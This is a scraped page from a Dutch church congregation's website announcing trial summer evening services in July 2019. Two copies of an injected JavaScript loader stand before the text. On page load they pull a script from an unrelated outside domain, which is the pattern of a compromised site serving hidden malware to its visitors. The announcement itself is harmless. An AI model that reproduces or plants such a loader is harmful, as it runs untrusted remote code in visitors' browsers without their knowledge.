;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zomeravonddiensten – een proef ! - PKN Damwâld

Zomeravonddiensten – een proef !

Gepubliceerd op: zaterdag 15 juni 2019

De gezamenlijke middagdiensten zijn al langer gespreksonderwerp in de samenwerking. Er is volgens ons meer uit te halen, meer mee te doen. De middagdiensten lenen zich voor een andere aanpak, bijv. een zangdienst, een leerdienst of een reeks preken over een thema. In het Samen Op Weg (SOW) overleg van maart kwam het plan om tijdens de zomer de middagdiensten te verplaatsen naar de avond. Dat biedt de kerkgangers de gelegenheid om overdag wat uitgebreider van het mooie weer te kunnen genieten, en in de relatieve avondrust nog een dienst bij te wonen. Een proef in de maand juli zal duidelijk moeten maken of het ook daadwerkelijk een goed idee is en of er wellicht meer mensen naar de avonddienst komen. Het omzetten kent wel een aantal voorwaarden: niet alleen de predikanten moeten kunnen op de avond, maar ook de beameraars, de organisten en de koster. Dat is nu rond. En de ambtsdragers die die zondagen dienst hebben: let op! Je wordt op die zondagen dus ’s morgens en ’s avonds verwacht!
Als het goed gaat hebben we in de komende juli-maand dus 3 avonddiensten; op 14, 21 en 28 juli zijn jullie van harte welkom om 19:30 uur, in de Ontmoeting.
De komende weken zullen we dit ook op de beamer, Us Tsjerkenijs en de Klok gaan vermelden. Laat het ons weten wanneer je dit een goed idee vindt (of juist niet). Bij een positieve uitkomst is het plan om het volgend jaar in de schoolvakantieperiode (zomer 2020) weer te doen.
Zomeravonddiensten – wellicht een nieuwe traditie?

Namens de beide kerkenraden,
Janet Alkema.